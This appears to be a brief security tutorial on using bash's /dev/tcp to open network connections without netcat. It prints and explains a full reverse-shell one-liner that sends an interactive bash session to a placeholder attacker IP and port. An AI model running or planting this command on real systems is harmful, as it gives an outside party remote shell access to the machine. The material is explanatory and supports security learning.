Netcat with no netcat: /dev/tcp.
This is a feature of bash (on most systems) that allows command interaction with the TCP stack of the machine. Data can be dumped into /dev/tcp/ipAddress/port, and bash will make the TCP connection with the data. You can leverage this to send a command shell across the network to a listener by invoking the following command:
/bin/bash -i > /dev/tcp/[attackerIP]/[port] 0<&1 2>&1
Here’s the breakdown:
Bash is being invoked in interactive (-i) mode and redirecting its output to /dev/tcp, which tells the system to make a TCP connection to a given IP on a given port. The 0<&1 2>&1 tells the system to duplicate the standard output and error file descriptors and connect them to the standard in of bash.